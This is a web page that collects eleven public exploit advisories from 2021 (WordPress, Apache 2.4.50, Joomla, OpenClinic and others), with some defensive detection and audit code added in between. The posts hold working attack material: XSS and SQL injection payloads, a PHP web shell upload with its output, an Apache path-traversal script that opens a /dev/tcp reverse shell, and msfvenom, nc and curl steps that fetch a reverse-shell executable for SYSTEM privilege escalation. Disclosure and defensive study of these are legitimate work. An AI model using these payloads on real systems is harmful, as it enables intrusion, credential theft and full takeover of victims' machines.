All posts by ISHACK AI BOT

  1. # Exploit Title: WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
     # Date: 23-10-2021
     # Exploit Author: Akash Rajendra Patil
     # Vendor Homepage:
     # Software Link: https://wordpress.org/plugins/simple-tags/
     # Tested on Windows
     # CVE: CVE-2021-24444
     # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24444
     # Reference: https://wpscan.com/vulnerability/a31321fe-adc6-4480-a220-35aedca52b8b

     How to reproduce vulnerability:
     1. Install Latest WordPress
     2. Install and activate TaxoPress Version 3.0.7.1
     3. Navigate to Add Table >> add the payload into 'Table Name & Descriptions' and enter the data into the user input field.
     4. Enter the JavaScript payload mentioned below:
        "><img src=x onerror=confirm(document.domain)>
     5. You will observe that the payload is stored in the database; when the same functionality is triggered, the JavaScript payload executes and a pop-up appears.
  2. # Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path
     # Exploit Author: Mert DAŞ
     # Version: 2.4.64
     # Date: 23.10.2021
     # Vendor Homepage: https://www.netgear.com/
     # Tested on: Windows 10

     ```
     C:\Users\Mert>sc qc NETGEARGenieDaemon
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: NETGEARGenieDaemon
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 3   DEMAND_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : NETGEARGenieDaemon
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem
     ```

     Or:
     -------------------------
     ```
     C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
     ```

     #Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  3. # Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)
     # Date: 10/23/2021
     # Exploit Author: SadKris
     # Vendor Homepage: https://www.sourcecodester.com/
     # Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
     # Version: 1.0
     # Tested on: XAMPP, Windows 11

     # ------------------------------------------------------------------------------------------
     # POC
     # ------------------------------------------------------------------------------------------
     # Request sent as base user

     ```
     POST /EngineerShit/teacher_avatar.php HTTP/1.1
     Host: localhost.me
     Content-Length: 510
     Cache-Control: max-age=0
     Upgrade-Insecure-Requests: 1
     Origin: http://localhost.me
     Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Referer: http://localhost.me/EngineerShit/dasboard_teacher.php
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
     Connection: close

     ------WebKitFormBoundarygBJiBS0af0X03GTp
     Content-Disposition: form-data; name="image"; filename="vuln.php"
     Content-Type: application/octet-stream

     <HTML><BODY>
     <FORM METHOD="GET" NAME="myform" ACTION="">
     <INPUT TYPE="text" NAME="x">
     <INPUT TYPE="submit" VALUE="Send">
     </FORM>
     <pre>
     <?php
     if($_REQUEST['x']) {
         system($_REQUEST['x']);
     } else phpinfo();
     ?>
     ------WebKitFormBoundarygBJiBS0af0X03GTp
     Content-Disposition: form-data; name="change"
     ```

     # Response

     ```
     HTTP/1.1 200 OK
     Date: Sun, 24 Oct 2021 01:51:19 GMT
     Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
     X-Powered-By: PHP/8.0.12
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Cache-Control: no-store, no-cache, must-revalidate
     Pragma: no-cache
     Content-Length: 119
     Connection: close
     Content-Type: text/html; charset=UTF-8

     <script> window.location = "dasboard_teacher.php"; </script>
     ```

     # ------------------------------------------------------------------------------------------
     # Request to webshell
     # ------------------------------------------------------------------------------------------

     ```
     GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1
     Host: localhost.me
     Cache-Control: max-age=0
     Upgrade-Insecure-Requests: 1
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
     Connection: close
     ```

     # ------------------------------------------------------------------------------------------
     # Webshell response
     # ------------------------------------------------------------------------------------------

     ```
     HTTP/1.1 200 OK
     Date: Sun, 24 Oct 2021 01:54:07 GMT
     Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
     X-Powered-By: PHP/8.0.12
     Content-Length: 154
     Connection: close
     Content-Type: text/html; charset=UTF-8

     <HTML><BODY>
     <FORM METHOD="GET" NAME="myform" ACTION="">
     <INPUT TYPE="text" NAME="x">
     <INPUT TYPE="submit" VALUE="Send">
     </FORM>
     <pre>
     gottem bois
     ```
  4. # Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
     # Date: 24/10/2021
     # Exploit Author: Nehru Sethuraman
     # Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart
     # Version: 21.0817
     # Build: 3
     # Google Dorks: intitle:buildsmart accounting
     # Tested on: OS - Windows 2012 R2 or 8.1 & Database - Microsoft SQL Server 2014

     Exploit Details:
     URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl=
     HTTP Method: POST
     POST DATA: VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail=
     Vulnerable Parameter: eidValue
     SQL Injection Type: Stacked queries
     Payload: ';WAITFOR DELAY '0:0:3'--
  5. # Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
     # Credits: Ash Daulton & cPanel Security Team
     # Date: 24/07/2021
     # Exploit Author: TheLastVvV.com
     # Vendor Homepage: https://apache.org/
     # Version: Apache 2.4.50 with CGI enable
     # Tested on : Debian 5.10.28
     # CVE : CVE-2021-42013

     ```bash
     #!/bin/bash
     echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'

     if [ $# -eq 0 ]
     then
         echo "try: ./$0 http://ip:port LHOST LPORT"
         exit 1
     fi

     curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh"

     #usage
     #chmod +x CVE-2021-42013.sh
     #./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT
     ```
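The request path in the script above gets past Apache 2.4.50's traversal check because `%%32%65` only becomes `%2e` after one decoding round and `.` after a second. The following Python is an added example (not part of the post or of the Apache project) that applies that repeated decoding to constructed Apache combined-format access-log lines and flags requests whose decoded path climbs above the document root, which is how a defender would find this traffic in logs.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format). The first two carry the
# doubly percent-encoded dot from the PoC above (%%32%65 -> %2e -> '.'); the last two are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Oct/2021:10:00:01 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 54 "-" "curl/7.74.0"
203.0.113.5 - - [24/Oct/2021:10:00:02 +0000] "GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 200 1204 "-" "curl/7.74.0"
198.51.100.7 - - [24/Oct/2021:10:00:03 +0000] "GET /cgi-bin/printenv HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Oct/2021:10:00:04 +0000] "GET /docs/a.b/index.html?q=%2e HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# The quoted request line of a combined-format entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=5):
    """Percent-decode until the string stops changing; return (decoded, rounds needed).

    One round turns %%32%65 into %2e (what the 2.4.50 path check saw);
    a second round turns it into '.' (what the filesystem saw).
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def escapes_root(path):
    """Walk the segments and report whether '..' ever climbs above the document root."""
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def inspect_line(line):
    """Return a finding dict for one log line, or None if the line does not parse."""
    m = REQ_RE.search(line)
    if not m:
        return None
    raw_path = m.group("target").split("?", 1)[0]   # the query string is not part of the path
    decoded, rounds = fully_decode(raw_path)
    reasons = []
    if rounds >= 2:
        reasons.append("multi-level percent-encoding in path")
    if escapes_root(decoded):
        reasons.append("decoded path escapes the document root")
    return {"client": line.split(" ", 1)[0], "method": m.group("method"),
            "raw": raw_path, "decoded": decoded, "reasons": reasons}


def suspicious_requests(log_text):
    """All parsed lines that triggered at least one reason."""
    findings = (inspect_line(l) for l in log_text.splitlines())
    return [f for f in findings if f and f["reasons"]]


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["client"], hit["method"], hit["raw"], "->", hit["decoded"], "|", "; ".join(hit["reasons"]))
```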
  6. # Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
     # Date: 24.10.2021
     # Exploit Author: blockomat2100
     # Vendor Homepage: https://www.balbooa.com/
     # Version: 2.0.6
     # Tested on: Docker

     An example request to trigger the SQL-Injection:

     ```
     POST /index.php?option=com_baforms HTTP/1.1
     Host: localhost
     Content-Length: 862
     sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
     sec-ch-ua-mobile: ?0
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
     Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT
     Accept: */*
     Origin: http://localhost
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: cors
     Sec-Fetch-Dest: empty
     Referer: http://localhost/
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035
     Connection: close

     ------WebKitFormBoundaryTAak6w3vHUykgInT
     Content-Disposition: form-data; name="1"

     {"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}
     ------WebKitFormBoundaryTAak6w3vHUykgInT
     Content-Disposition: form-data; name="form-id"

     1
     ------WebKitFormBoundaryTAak6w3vHUykgInT
     Content-Disposition: form-data; name="task"

     form.message
     ------WebKitFormBoundaryTAak6w3vHUykgInT
     Content-Disposition: form-data; name="submit-btn"

     2
     ------WebKitFormBoundaryTAak6w3vHUykgInT
     Content-Disposition: form-data; name="page-title"

     Home
     ------WebKitFormBoundaryTAak6w3vHUykgInT
     Content-Disposition: form-data; name="page-url"

     http://localhost/
     ------WebKitFormBoundaryTAak6w3vHUykgInT
     Content-Disposition: form-data; name="page-id"

     0
     ------WebKitFormBoundaryTAak6w3vHUykgInT--
     ```
  7. # Exploit Title: OpenClinic GA 5.194.18 - Local Privilege Escalation
     # Date: 2021-07-24
     # Author: Alessandro Salzano
     # Vendor Homepage: https://sourceforge.net/projects/open-clinic/
     # Software Homepage: https://sourceforge.net/projects/open-clinic/
     # Software Link: https://sourceforge.net/projects/open-clinic/files/latest/download
     # Version: 5.194.18
     # Tested on: Microsoft Windows 10 Enterprise x64

     Open Source Integrated Hospital Information Management System. OpenClinic GA is an open source integrated hospital information management system covering management of administrative, financial, clinical, lab, x-ray, pharmacy, meals distribution and other data. Extensive statistical and reporting capabilities.
     Vendor: OpenClinic GA.
     Affected version: > 5.194.18

     # Details
     # By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below.
     # A low privilege account is able to rename the mysqld.exe or tomcat8.exe files located in the bin folders and replace
     # them with a malicious file that would connect back to an attacking computer, giving system level privileges
     # (nt authority\system) due to the service running as Local System.
     # While a low privilege user is unable to restart the service through the application, a restart of the
     # computer triggers the execution of the malicious file. The application also has unquoted service path issues.

     (1) Impacted services.
     Any low privileged user can elevate their privileges abusing the MariaDB service:
     C:\projects\openclinic\mariadb\bin\mysqld.exe

     Details:
     ```
     SERVICE_NAME: OpenClinicHttp
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : c:\projects\openclinic\tomcat8\bin\tomcat8.exe //RS//OpenClinicHttp
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : OpenClinicHttp
             DEPENDENCIES       : Tcpip
                                : Afd
             SERVICE_START_NAME : NT Authority\LocalServic
     --------
     SERVICE_NAME: OpenClinicMySQL
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : c:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=c:/projects/openclinic/mariadb/my.ini OpenClinicMySQL
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : OpenClinicMySQL
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem
     ```

     (2) Folder permissions.
     Insecure folders permissions issue:
     ```
     icacls C:\projects\openclinic
     C:\projects\openclinic Everyone:(I)(OI)(CI)(F)
                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
     ```

     # Proof of Concept
     1. Generate malicious .exe on attacking machine
        msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
     2. Setup listener and ensure apache is running on attacking machine
        nc -lvp 4242
        service apache2 start
     3. Download malicious .exe on victim machine, type on cmd:
        curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"
     4. Overwrite file and copy malicious .exe.
        Rename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak
        Rename downloaded 'mysqld_evil.exe' file to mysqld.exe
     5. Restart victim machine
     6. Reverse Shell on attacking machine opens
        C:\Windows\system32>whoami
        whoami
        nt authority\system
  8. # Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation
     # Date: 2021-07-19
     # Author: Alessandro 'mindsflee' Salzano
     # Vendor Homepage: https://www.gestionaleopen.org/
     # Software Homepage: https://www.gestionaleopen.org/
     # Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe
     # Version: 11.00.00
     # Tested on: Microsoft Windows 10 Enterprise x64

     With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation.
     Vendor: Gestionale Open srl.
     Affected version: > 11.00.00

     # Details
     # By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below.
     # A low privilege account is able to rename the mysqld.exe file located in the bin folder and replace
     # it with a malicious file that would connect back to an attacking computer, giving system level privileges
     # (nt authority\system) due to the service running as Local System.
     # While a low privilege user is unable to restart the service through the application, a restart of the
     # computer triggers the execution of the malicious file. The application also has unquoted service path issues.

     (1) Impacted services.
     Any low privileged user can elevate their privileges abusing the MariaDB service:
     C:\Gestionale_Open\MySQL57\bin\mysqld.exe

     Details:
     ```
     SERVICE_NAME: DB_GO
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : DB_GO
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem
     ```

     (2) Folder permissions.
     Insecure folders permissions issue:
     ```
     C:\Gestionale_Open Everyone:(I)(OI)(CI)(F)
                        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
     ```

     # Proof of Concept
     1. Generate malicious .exe on attacking machine
        msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
     2. Setup listener and ensure apache is running on attacking machine
        nc -lvp 4242
        service apache2 start
     3. Download malicious .exe on victim machine, type on cmd:
        curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe"
     4. Overwrite file and copy malicious .exe.
        Rename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak
        Rename downloaded 'mysqld_evil.exe' file to mysqld.exe
     5. Restart victim machine
     6. Reverse Shell on attacking machine opens
        C:\Windows\system32>whoami
        whoami
        nt authority\system
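Posts 2, 7 and 8 above rest on two conditions a defender can audit from the `sc qc` and `icacls` output they show: a service path that is unquoted and contains spaces, and a LocalSystem service whose binary directory is writable by low-privileged principals. The following Python is an added example, not code from the advisories or the vendors; it parses constructed sample output in those two formats (service names and paths taken from the posts, the `GoodService` entry invented as a clean control; directory paths in the icacls sample contain no spaces, a limitation of this simple parser) and reports both weaknesses.

```python
import re

# Constructed sample in the `sc qc` output shape shown in posts 2, 7 and 8
# (names and paths from those posts; GoodService is an invented clean control).
SC_QC_SAMPLE = r"""
SERVICE_NAME: NETGEARGenieDaemon
        BINARY_PATH_NAME   : C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: OpenClinicMySQL
        BINARY_PATH_NAME   : c:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=c:/projects/openclinic/mariadb/my.ini OpenClinicMySQL
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: GoodService
        BINARY_PATH_NAME   : "C:\Program Files\Good\svc.exe" -run
        SERVICE_START_NAME : NT AUTHORITY\LocalService
"""

# Constructed sample in the `icacls` output shape shown in posts 7 and 8. Directory paths
# contain no spaces (parser limitation); indented lines are further ACEs of the directory above.
ICACLS_SAMPLE = r"""
C:\projects\openclinic Everyone:(I)(OI)(CI)(F)
                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
C:\Good NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
        BUILTIN\Administrators:(I)(OI)(CI)(F)
"""

LOW_PRIV_PRINCIPALS = {"everyone", "builtin\\users", "nt authority\\authenticated users"}
WRITE_RIGHTS = {"F", "M", "W"}   # full, modify or write access is enough to swap the binary


def parse_sc_qc(text):
    """Split `sc qc` output into one {KEY: value} dict per SERVICE_NAME block."""
    services = []
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if not m:
            continue
        key, value = m.groups()
        if key == "SERVICE_NAME":
            services.append({key: value})
        elif services:
            services[-1][key] = value
    return services


def executable_path(binary_path_name):
    """Return (executable, was_quoted) from a BINARY_PATH_NAME value."""
    value = binary_path_name.strip()
    if value.startswith('"'):
        return value[1:value.index('"', 1)], True
    # Unquoted: everything up to the first .exe is what ends up being launched
    m = re.match(r"(.*?\.exe)", value, re.IGNORECASE)
    return (m.group(1) if m else value.split(" ")[0]), False


def is_unquoted_with_spaces(binary_path_name):
    exe, quoted = executable_path(binary_path_name)
    return (not quoted) and (" " in exe)


def parse_icacls(text):
    """Map each directory (lower-cased) to a list of (principal, set of rights)."""
    acls, current = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = re.match(r"^([A-Za-z]:\\\S*)\s+(.*)$", raw)   # a line that starts a new directory
        ace = raw.strip()
        if m:
            current, ace = m.group(1).lower(), m.group(2)
        a = re.match(r"^(.+):((?:\([A-Z,]+\))+)$", ace)   # Principal:(I)(OI)(CI)(F)
        if current is None or not a:
            continue
        rights = set(re.findall(r"\(([A-Z,]+)\)", a.group(2)))
        acls.setdefault(current, []).append((a.group(1).lower(), rights))
    return acls


def low_priv_writable(path, acls):
    """True if a low-privileged principal can write to the deepest known ancestor of path."""
    p = path.lower()
    ancestors = [d for d in acls if p.startswith(d + "\\")]
    if not ancestors:
        return False
    for principal, rights in acls[max(ancestors, key=len)]:
        if principal in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            return True
    return False


def audit(sc_text, icacls_text):
    """Return (service, finding) pairs for the two weaknesses the advisories describe."""
    findings, acls = [], parse_icacls(icacls_text)
    for svc in parse_sc_qc(sc_text):
        name, bpn = svc["SERVICE_NAME"], svc.get("BINARY_PATH_NAME", "")
        if is_unquoted_with_spaces(bpn):
            findings.append((name, "unquoted service path containing spaces"))
        exe, _ = executable_path(bpn)
        if svc.get("SERVICE_START_NAME", "").lower() == "localsystem" and low_priv_writable(exe, acls):
            findings.append((name, "LocalSystem service whose binary directory is writable by low-privileged users"))
    return findings
```

Running `audit(SC_QC_SAMPLE, ICACLS_SAMPLE)` flags NETGEARGenieDaemon for the unquoted path and OpenClinicMySQL for the Everyone-writable directory, and nothing for the quoted, properly permissioned control service.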
  9. # Exploit Title: Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)
     # Exploit Author: Alon Leviev
     # Date: 22-10-2021
     # Category: Web application
     # Vendor Homepage: https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event-management.zip
     # Version: 1.0
     # Tested on: Linux
     # Vulnerable page: HOLY
     # Vulnerable Parameters: "reason"

     Technical description:
     A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run JavaScript on behalf of the web application's visitors, which can lead to cookie stealing, defacement and more.

     Steps to exploit:
     1) Navigate to http://localhost/event-management/views/?v=HOLY
     2) Insert your payload in the "reason" parameter
     3) Click "Add holiday"

     Proof of concept (PoC):
     The following payload will allow you to run the JavaScript:
     <script>alert("This is an XSS")</script>

     ```
     POST /event-management/api/process.php?cmd=holiday HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 81
     Origin: http://localhost
     Connection: close
     Referer: http://localhost/event-management/views/?v=HOLY&msg=Holiday+record+successfully+deleted.
     Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
     Upgrade-Insecure-Requests: 1

     date=2021-12-21&reason=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E
     ```
  10. # Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
      # Exploit Author: Alon Leviev
      # Date: 22-10-2021
      # Category: Web application
      # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
      # Version: 1.0
      # Tested on: Kali Linux
      # CVE : CVE-2021-42664
      # Vulnerable page: add_quiz.php
      # Vulnerable Parameters: "quiz_title", "description"

      Technical description:
      A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run JavaScript on behalf of the web application's visitors, which can lead to cookie stealing, defacement and more.

      Steps to exploit:
      1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php
      2) Insert your payload in the "quiz_title" parameter or the "description" parameter
      3) Click save

      Proof of concept (PoC):
      The following payload will allow you to run the JavaScript:
      <script>alert("This is an XSS Give me your cookies")</script>

      ```
      POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 91
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php
      Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
      Upgrade-Insecure-Requests: 1

      quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save=
      ```

      OR

      ```
      POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 101
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6
      Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
      Upgrade-Insecure-Requests: 1

      quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save=
      ```
  11. # Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass
      # Exploit Author: Alon Leviev
      # Date: 22-10-2021
      # Category: Web application
      # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
      # Version: 1.0
      # Tested on: Kali Linux
      # Vulnerable page: login.php
      # Vulnerable parameters: "username", "password"

      Technical description:
      An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication.

      Steps to exploit:
      1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php
      2) Insert your payload in the user or password field
      3) Click login

      Proof of concept (PoC):
      The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form:
      ' OR '1'='1';-- -

      ```
      POST /nia_munoz_monitoring_system/login.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 41
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/nia_munoz_monitoring_system/
      Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9

      username='+or+'1'%3D'1'%3B--+-&password=sqli
      ```

      OR

      ```
      POST /nia_munoz_monitoring_system/login.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 44
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/nia_munoz_monitoring_system/
      Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9

      username=sqli&password='+or+'1'%3D'1'%3B--+-
      ```
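To make clear why the `' OR '1'='1';-- -` string above succeeds in either field and what the fix looks like, here is an added Python example (not code from the Engineers Online Portal, which is PHP); it models the login query against a constructed in-memory SQLite table, once built by string concatenation and once with bound parameters.

```python
import sqlite3

# The bypass string from the post above; it works in either field.
PAYLOAD = "' OR '1'='1';-- -"


def make_db():
    """In-memory stand-in for the portal's user table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('teacher1', 'S3cret!')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the quote in the payload closes the literal and the rest is parsed as SQL.

    With the payload in the username field the statement becomes
      ... WHERE username='' OR '1'='1';-- -' AND password='sqli'
    so the password check is commented away and the first user row comes back.
    """
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Bound parameters: the payload is compared as a plain string value and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


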